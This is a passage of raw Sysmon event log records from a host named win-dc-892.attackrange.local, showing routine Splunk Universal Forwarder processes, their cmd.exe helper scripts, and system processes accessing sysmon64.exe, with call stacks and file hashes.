Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.018{266CAFBE-64EF-6064-E600-00000000AE01}64366356C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:56.030{266CAFBE-64F0-6064-EB00-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EF-6064-E600-00000000AE01}6436C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" 
_internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000008418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.967{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.967{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.969{266CAFBE-64F1-6064-F900-00000000AE01}5452C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.858{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.842{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.842{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.857{266CAFBE-64F1-6064-F800-00000000AE01}6884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.655{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 
Files\SplunkUniversalForwarder\var\run\splunk\composite.xmlMD5=BAA3D9652166DC4163F7323B34F168FA,SHA256=0A1E4AAE2B282671AA08BBBF61D7B1808B52B350A12845444CD028CBDBBDA44D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64F1-6064-F600-00000000AE01}69686976C:\Windows\system32\cmd.exe{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.602{266CAFBE-64F1-6064-F700-00000000AE01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000008393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.593{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F600-00000000AE01}6968C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:57.593{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C